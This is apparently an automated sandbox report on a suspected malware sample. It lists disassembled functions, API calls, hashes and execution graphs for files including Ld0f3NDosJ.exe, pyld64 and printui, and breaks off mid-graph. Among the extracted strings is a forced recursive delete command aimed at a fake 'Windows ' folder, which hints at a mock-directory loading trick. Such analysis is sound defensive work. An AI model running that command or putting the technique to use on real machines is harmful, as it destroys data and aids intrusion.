                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1467352782-3733052814
                          • Opcode ID: 0f82fb2d3ad31d1d66fdef862e6fc3d28219c5a25c697c5c52fec34cb4bfdd94
                          • Instruction ID: 0ce777a2bf4f269a82a740b75d2689da0f0b9ead8e5f8043d75c22f78927a978
                          • Opcode Fuzzy Hash: 0f82fb2d3ad31d1d66fdef862e6fc3d28219c5a25c697c5c52fec34cb4bfdd94
                          • Instruction Fuzzy Hash: DD71BE7291C68186EB60BFA194447BDBBE1FB40B89F089135DE4C87A89CF2ED591CB41
                          Function 00007FF646E47570 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: rmdir /s /q "{}Windows \"
                          • API String ID: 3668304517-3837830258
                          • Opcode ID: a759d48ec16a8946202d260abdf6d8aed099bd78d688fbf9fb871c07463b6b49
                          • Instruction ID: a8f64c2cc37b6b42e60fde13c2cf1a6868281f213fcda1ef4900a10b4478837a
                          • Opcode Fuzzy Hash: a759d48ec16a8946202d260abdf6d8aed099bd78d688fbf9fb871c07463b6b49
                          • Instruction Fuzzy Hash: 3C517D72B0DB8199EB00AF78D4803EC63E1FB54798F406636EA5D93A99EF79D194C340
                          Function 00007FF646E5F2B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CreateFrameInfo__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2558813199-1018135373
                          • Opcode ID: ad2ba110bbec0c490ddea6de1ab49c95b7244d5675ece0e49c85581df8a2d1ef
                          • Instruction ID: 9e53d82f4d886b38e530147312dacc77ab05c3a97aecf9c2d97223d9349bb5ad
                          • Opcode Fuzzy Hash: ad2ba110bbec0c490ddea6de1ab49c95b7244d5675ece0e49c85581df8a2d1ef
                          • Instruction Fuzzy Hash: 4B512B7661C74186EA20FB66E54026DBBE4FB88B90F101139EB8D87B66CF3DE451CB01
                          Function 00007FF646E63C28 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Users\user\Desktop\Ld0f3NDosJ.exe
                          • API String ID: 3307058713-2886519679
                          • Opcode ID: dc08b98884e5cc01c5dfc0b6debda3346ccd11862c75ac40e9c1eaeda5616f18
                          • Instruction ID: d810d6d99a5edc8f95b9db752d203c9042ce33e50ad038f76d82a37624b38030
                          • Opcode Fuzzy Hash: dc08b98884e5cc01c5dfc0b6debda3346ccd11862c75ac40e9c1eaeda5616f18
                          • Instruction Fuzzy Hash: 44414E36A0CB1285E714FF25D4400BDA7E4FF847D4B956035EA4E87B95DE3AE4828750
                          Function 00007FF646E68010 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 25aa8f2d82525bf823d4221f4dd8133c36d17dee247ba30e8a756d0ec50b3ddd
                          • Instruction ID: c28224fc0e200d31ab1b33d8899f0a618f4ffda885c31f2edf8474580553f9d5
                          • Opcode Fuzzy Hash: 25aa8f2d82525bf823d4221f4dd8133c36d17dee247ba30e8a756d0ec50b3ddd
                          • Instruction Fuzzy Hash: DD41E362A1DA8186EB50BF25E4047AAB7E0FB88784F841131EB4DC7758EF7DD445C710
                          Function 00007FF646E5C9E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF646E4118F), ref: 00007FF646E5CA30
                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF646E4118F), ref: 00007FF646E5CA71
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: b1403b4c9b76349453813f366b5515ddc48ecabc2ad87a5b831bc11eca843e65
                          • Instruction ID: 95f3fed40b7efaff98be51a89e3416b75517f72c27bebc466c8a43df0c5bb544
                          • Opcode Fuzzy Hash: b1403b4c9b76349453813f366b5515ddc48ecabc2ad87a5b831bc11eca843e65
                          • Instruction Fuzzy Hash: 79115B7260CB8082EB60EB15E450269BBE4FB88B88F584234EE8D47759DF3DC551CB00

                          Non-executed Functions

                          Function 00007FF7FC903EF0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2442201936.00007FF7FC8E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7FC8E0000, based on PE: true
                          • Associated: 0000000E.00000002.2442152956.00007FF7FC8E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 0000000E.00000002.2444309888.00007FF7FD755000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 0000000E.00000002.2444335818.00007FF7FD758000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_7ff7fc8e0000_pyld64.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                          • Instruction ID: dc4c43837b26b994d30c867c55cc00ff37de7dfc6b0870c3d0e838e6607a2deb
                          • Opcode Fuzzy Hash: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                          • Instruction Fuzzy Hash: 93115136B14F018AEB00DF70E8552B873A4FB59768F840E35DA2D477A4DF38D2548390

                          Non-executed Functions

                          Function 00007FF6B8FB9BE4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000018.00000002.2514290910.00007FF6B8FA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6B8FA0000, based on PE: true
                          • Associated: 00000018.00000002.2514115938.00007FF6B8FA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000018.00000002.2514383144.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000018.00000002.2516395872.00007FF6B9DA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                          • Associated: 00000018.00000002.2516413364.00007FF6B9DA3000.00000002.00000001.01000000.00000008.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_7ff6b8fa0000_usvcinsta64.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                          • Instruction ID: 46ad6b3313d5aa512539158ed786a66dd59f0658803ef29a4b255ce6d07b0c97
                          • Opcode Fuzzy Hash: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                          • Instruction Fuzzy Hash: 3D114832B14F028AEB00CF74E8442A833A4FB2A759F041E31DB6D837A4DF38D1698344

                          Execution Graph

                          Execution Coverage:34.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:73
                          Total number of Limit Nodes:2
                          execution_graph 234 7ff68c621789 235 7ff68c621798 _exit 234->235 236 7ff68c6217a1 234->236 235->236 237 7ff68c6217b6 236->237 238 7ff68c6217aa _cexit 236->238 238->237 187 7ff68c621570 GetStartupInfoW 188 7ff68c6215af 187->188 189 7ff68c6215c1 188->189 190 7ff68c6215ca Sleep 188->190 191 7ff68c6215e6 _amsg_exit 189->191 193 7ff68c6215f4 189->193 190->188 191->193 192 7ff68c62166a _initterm 195 7ff68c621687 _IsNonwritableInCurrentImage 192->195 193->192 194 7ff68c62164b 193->194 193->195 195->194 201 7ff68c6210e0 HeapSetInformation 195->201 198 7ff68c621748 exit 199 7ff68c621750 198->199 199->194 200 7ff68c621759 _cexit 199->200 200->194 202 7ff68c621d26 201->202 203 7ff68c62112c LoadCursorW GetStockObject RegisterClassW CreateWindowExW RegCreateKeyExW 202->203 204 7ff68c621219 RegQueryValueExW 203->204 205 7ff68c6212c4 GetLastError 203->205 207 7ff68c621252 204->207 206 7ff68c6212d0 LoadLibraryW 205->206 210 7ff68c6212fb GetProcAddress 206->210 211 7ff68c6212eb GetLastError 206->211 208 7ff68c621267 RegDeleteValueW 207->208 209 7ff68c62127e RegSetValueExW 207->209 212 7ff68c621258 207->212 208->212 213 7ff68c6212b2 RegCloseKey 209->213 215 7ff68c621327 GetCommandLineW 210->215 216 7ff68c621319 GetLastError 210->216 214 7ff68c621361 RegOpenKeyExW 211->214 212->209 212->213 213->206 219 7ff68c6213f9 GetLastError 214->219 220 7ff68c621394 RegQueryValueExW RegCloseKey RegDeleteKeyExW 214->220 225 7ff68c621008 215->225 217 7ff68c621350 FreeLibrary 216->217 217->214 221 7ff68c621405 219->221 220->221 223 7ff68c621419 221->223 224 7ff68c62140a DestroyWindow 221->224 223->198 223->199 224->223 226 7ff68c6210ca 225->226 227 7ff68c621020 225->227 226->217 228 7ff68c621028 iswspace 227->228 230 7ff68c62103e 227->230 228->227 228->230 229 7ff68c621087 iswspace 229->230 231 7ff68c621051 229->231 230->226 230->229 230->231 231->226 232 7ff68c6210b4 iswspace 231->232 232->226 232->231 233 7ff68c621520 __wgetmainargs 239 7ff68c621d50 _XcptFilter 240 7ff68c621810 241 7ff68c621819 240->241 242 7ff68c621824 241->242 243 7ff68c621ba0 RtlCaptureContext RtlLookupFunctionEntry 241->243 244 7ff68c621c27 243->244 245 7ff68c621be5 RtlVirtualUnwind 243->245 248 7ff68c621b5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 244->248 245->244 249 7ff68c6217e0 252 7ff68c621a54 249->252 253 7ff68c621a80 6 API calls 252->253 254 7ff68c6217e9 252->254 253->254 255 7ff68c621880 SetUnhandledExceptionFilter 256 7ff68c621840 257 7ff68c62184f 256->257 258 7ff68c621872 256->258 257->258 259 7ff68c62186b ?terminate@ 257->259 259->258 260 7ff68c621440 262 7ff68c621452 260->262 267 7ff68c621908 GetModuleHandleW 262->267 263 7ff68c6214b9 __set_app_type 264 7ff68c6214f6 263->264 265 7ff68c62150c 264->265 266 7ff68c6214ff __setusermatherr 264->266 266->265 268 7ff68c62191d 267->268 268->263

                          Callgraph

                          Executed Functions

                          Function 00007FF68C6210E0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 195registrylibrarymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                          • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                          • API String ID: 2613610799-4035671587
                          • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                          • Instruction ID: a2e38c170dce36f001aa98e3861e2c2eb697915b21fc9f1b116636c62b2ef146
                          • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                          • Instruction Fuzzy Hash: EDA12932A18A42CAEB118B60E4647B97BA0FF4DB99F415139DB1E87B54DF38D485D700
                          Function 00007FF68C621570 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 27 7ff68c621570-7ff68c6215ac GetStartupInfoW 28 7ff68c6215af-7ff68c6215ba 27->28 29 7ff68c6215d7 28->29 30 7ff68c6215bc-7ff68c6215bf 28->30 33 7ff68c6215dc-7ff68c6215e4 29->33 31 7ff68c6215ca-7ff68c6215d5 Sleep 30->31 32 7ff68c6215c1-7ff68c6215c8 30->32 31->28 32->33 34 7ff68c6215e6-7ff68c6215f2 _amsg_exit 33->34 35 7ff68c6215f4-7ff68c6215fc 33->35 36 7ff68c621660-7ff68c621668 34->36 37 7ff68c6215fe-7ff68c62161a 35->37 38 7ff68c621655 35->38 41 7ff68c621687-7ff68c621689 36->41 42 7ff68c62166a-7ff68c62167d _initterm 36->42 39 7ff68c62161e-7ff68c621621 37->39 40 7ff68c62165b 38->40 43 7ff68c621647-7ff68c621649 39->43 44 7ff68c621623-7ff68c621625 39->44 40->36 45 7ff68c62168b-7ff68c62168e 41->45 46 7ff68c621695-7ff68c62169c 41->46 42->41 43->40 50 7ff68c62164b-7ff68c621650 43->50 49 7ff68c621627-7ff68c62162a 44->49 44->50 45->46 47 7ff68c6216c8-7ff68c6216d5 46->47 48 7ff68c62169e-7ff68c6216ac call 7ff68c6219c0 46->48 54 7ff68c6216d7-7ff68c6216dc 47->54 55 7ff68c6216e1-7ff68c6216e6 47->55 48->47 59 7ff68c6216ae-7ff68c6216be 48->59 52 7ff68c62163c-7ff68c621645 49->52 53 7ff68c62162c-7ff68c621638 49->53 56 7ff68c6217b6-7ff68c6217d3 50->56 52->39 53->52 54->56 58 7ff68c6216ea-7ff68c6216f1 55->58 61 7ff68c621767-7ff68c62176b 58->61 62 7ff68c6216f3-7ff68c6216f6 58->62 59->47 63 7ff68c62177b-7ff68c621784 61->63 64 7ff68c62176d-7ff68c621777 61->64 65 7ff68c6216f8-7ff68c6216fa 62->65 66 7ff68c6216fc-7ff68c621702 62->66 63->58 64->63 65->61 65->66 67 7ff68c621712-7ff68c621746 call 7ff68c6210e0 66->67 68 7ff68c621704-7ff68c621710 66->68 71 7ff68c621748-7ff68c62174a exit 67->71 72 7ff68c621750-7ff68c621757 67->72 68->66 71->72 73 7ff68c621759-7ff68c62175f _cexit 72->73 74 7ff68c621765 72->74 73->74 74->56
                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                          • String ID:
                          • API String ID: 642454821-0
                          • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                          • Instruction ID: e2c88115207ee3f7db3dad7e61d92f6d9125ffb7aeae9590ddd1031f3ccf375b
                          • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                          • Instruction Fuzzy Hash: 2A612425A0D643C2EB628B11A960A3923A5BF8CB80F584139DA4DD36A4DF3DEDC1E700
                          Function 00007FF68C621520 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 75 7ff68c621520-7ff68c621568 __wgetmainargs
                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: __wgetmainargs
                          • String ID:
                          • API String ID: 1709950718-0
                          • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                          • Instruction ID: 868366834460a14921c03b5fb98cd45c79ef633da5ef9b79d83795c249ea7a5a
                          • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                          • Instruction Fuzzy Hash: D8E07574E09E47D6EA12CB10E9609A4B768BF1C754B80003AC50D93720DF3CA289EB24

                          Non-executed Functions

                          Function 00007FF68C621A54 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000028.00000002.2603323584.00007FF68C621000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF68C620000, based on PE: true
                          • Associated: 00000028.00000002.2603302577.00007FF68C620000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000028.00000002.2603364581.00007FF68C624000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_40_2_7ff68c620000_printui.jbxd
                          Similarity
                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 4104442557-0
                          • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                          • Instruction ID: 62dd4c5125aa4d387c6ecf8000f50d0a643c2d84fb4c78bc1f207de11493f4c4
                          • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                          • Instruction Fuzzy Hash: BC111D22A04F41CAEB11DF60E86826833A4FB4C758F400A39EB6D87B54EF7CD6A4D340

                          Execution Graph

                          Execution Coverage:2.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:20.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:126
                          execution_graph 122582 7ffda333daa0 122622 7ffda33aedf0 122582->122622 122585 7ffda333dade CRYPTO_THREAD_lock_new 122587 7ffda333db2d CRYPTO_free 122585->122587 122588 7ffda333db03 CRYPTO_new_ex_data 122585->122588 122586 7ffda333dad6 122590 7ffda333db45 ERR_new ERR_set_debug ERR_set_error 122587->122590 122589 7ffda333db20 CRYPTO_THREAD_lock_free 122588->122589 122596 7ffda333dbe1 122588->122596 122589->122587 122591 7ffda333dbc8 122590->122591 122592 7ffda333db78 122590->122592 122592->122591 122593 7ffda333db84 CRYPTO_free_ex_data 122592->122593 122594 7ffda333db9b 122593->122594 122677 7ffda3333a70 122594->122677 122595 7ffda333dc3f OPENSSL_sk_dup 122597 7ffda333dca0 ERR_new ERR_set_debug ERR_set_error 122595->122597 122598 7ffda333dcd3 122595->122598 122596->122595 122597->122592 122624 7ffda332cb70 122598->122624 122602 7ffda333dcdf 122602->122590 122602->122592 122603 7ffda333dd73 X509_VERIFY_PARAM_new 122602->122603 122604 7ffda333ddef X509_VERIFY_PARAM_inherit 122603->122604 122605 7ffda333ddbc ERR_new ERR_set_debug ERR_set_error 122603->122605 122606 7ffda333de03 122604->122606 122605->122592 122607 7ffda333ded8 CRYPTO_memdup 122606->122607 122608 7ffda333df09 122606->122608 122607->122592 122607->122608 122609 7ffda333df23 CRYPTO_memdup 122608->122609 122610 7ffda333df57 122608->122610 122609->122592 122609->122610 122611 7ffda333df75 CRYPTO_malloc 122610->122611 122613 7ffda333dfca 122610->122613 122611->122592 122612 7ffda333dfa6 memcpy 122611->122612 122612->122613 122613->122590 122662 7ffda333e220 122613->122662 122614 7ffda333e053 122614->122590 122615 7ffda333e0c2 CRYPTO_memdup 122614->122615 122616 7ffda333e0eb 122614->122616 122615->122590 122615->122616 122617 7ffda333e105 CRYPTO_memdup 122616->122617 122618 7ffda333e12e 122616->122618 122617->122590 122617->122618 122618->122590 122618->122591 122623 7ffda333daae CRYPTO_zalloc 122622->122623 122623->122585 122623->122586 122625 7ffda33aedf0 122624->122625 122626 7ffda332cb7d CRYPTO_zalloc 122625->122626 122627 7ffda332cb9f CRYPTO_zalloc 122626->122627 122628 7ffda332cbe0 122626->122628 122629 7ffda332cbcd CRYPTO_free 122627->122629 122630 7ffda332cbe9 122627->122630 122628->122602 122629->122628 122631 7ffda332cc33 EVP_PKEY_up_ref 122630->122631 122634 7ffda332cc3c 122630->122634 122631->122634 122632 7ffda332cd04 122633 7ffda332cd0e CRYPTO_malloc 122632->122633 122635 7ffda332cecd 122632->122635 122636 7ffda332cd30 memcpy 122633->122636 122637 7ffda332cd7e 122633->122637 122634->122632 122638 7ffda332cc86 X509_up_ref 122634->122638 122639 7ffda332cc97 EVP_PKEY_up_ref 122634->122639 122644 7ffda332ccad X509_chain_up_ref 122634->122644 122650 7ffda332ccc8 CRYPTO_memdup 122634->122650 122640 7ffda332ced7 CRYPTO_malloc 122635->122640 122641 7ffda332cf1a 122635->122641 122636->122635 122642 7ffda332cd94 EVP_PKEY_free 122637->122642 122643 7ffda332ceab 122637->122643 122638->122634 122639->122634 122640->122637 122645 7ffda332cefd memcpy 122640->122645 122651 7ffda332cf4a 122641->122651 122652 7ffda332cf27 CRYPTO_memdup 122641->122652 122646 7ffda332ce07 CRYPTO_free CRYPTO_free CRYPTO_free X509_STORE_free X509_STORE_free 122642->122646 122647 7ffda332cda6 122642->122647 122643->122602 122644->122634 122649 7ffda332cd50 ERR_new ERR_set_debug ERR_set_error 122644->122649 122645->122641 122706 7ffda3392880 CRYPTO_free CRYPTO_free CRYPTO_free 122646->122706 122653 7ffda332cdb0 X509_free EVP_PKEY_free OSSL_STACK_OF_X509_free CRYPTO_free 122647->122653 122649->122637 122650->122634 122650->122637 122655 7ffda332cf7e 122651->122655 122656 7ffda332cf71 X509_STORE_up_ref 122651->122656 122652->122637 122652->122651 122653->122646 122653->122653 122654 7ffda332ce67 CRYPTO_free CRYPTO_free CRYPTO_free 122654->122643 122657 7ffda332cf94 122655->122657 122658 7ffda332cf87 X509_STORE_up_ref 122655->122658 122656->122655 122707 7ffda3392630 6 API calls 122657->122707 122658->122657 122660 7ffda332cfcf 122660->122637 122660->122643 122661 7ffda332cfe3 CRYPTO_strdup 122660->122661 122661->122637 122661->122643 122664 7ffda333e235 122662->122664 122663 7ffda333e312 122663->122614 122664->122663 122708 7ffda33449c0 122664->122708 122666 7ffda333e26d 122678 7ffda3333fc4 CRYPTO_THREAD_lock_free CRYPTO_free 122677->122678 122679 7ffda3333a79 122677->122679 122678->122591 122679->122678 122680 7ffda3333ac0 CRYPTO_free CRYPTO_free 122679->122680 122681 7ffda3333b10 122680->122681 122682 7ffda3333b1a 7 API calls 122680->122682 122846 7ffda33434e0 15 API calls 122681->122846 122847 7ffda332d010 16 API calls 122682->122847 122685 7ffda3333b73 OPENSSL_sk_pop_free OPENSSL_sk_pop_free OSSL_STACK_OF_X509_free OPENSSL_sk_free 122848 7ffda33540e0 9 API calls 122685->122848 122687 7ffda3333bc0 122688 7ffda3333bcc CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_free CRYPTO_secure_free 122687->122688 122689 7ffda3333c55 EVP_MD_get0_provider 122688->122689 122690 7ffda3333c6a 122688->122690 122689->122690 122691 7ffda3333c62 EVP_MD_free 122689->122691 122692 7ffda3333c76 EVP_MD_get0_provider 122690->122692 122693 7ffda3333c8b 122690->122693 122691->122690 122692->122693 122694 7ffda3333c83 EVP_MD_free 122692->122694 122695 